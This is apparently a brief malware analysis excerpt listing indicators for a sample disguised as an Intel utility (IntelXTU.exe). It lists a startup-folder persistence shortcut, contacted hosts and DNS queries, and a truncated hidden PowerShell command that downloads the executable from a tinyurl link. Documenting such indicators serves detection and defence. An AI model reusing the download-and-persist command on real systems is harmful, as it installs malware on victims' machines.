Technical Information
- %HOMEPATH%\start menu\programs\startup\intelxtu.lnk
- %APPDATA%\microsoft\clr\intelxtu.exe
- 'ti##url.com':443
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK ti##url.com
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -windowstyle hidden "mkdir %APPDATA%\Microsoft\CLR\; $a = New-Object System.Net.WebClient; $a.DownloadFile('https://tinyurl.com/okaytest11','%APPDATA%\Microsoft\CLR\\IntelXTU.exe'...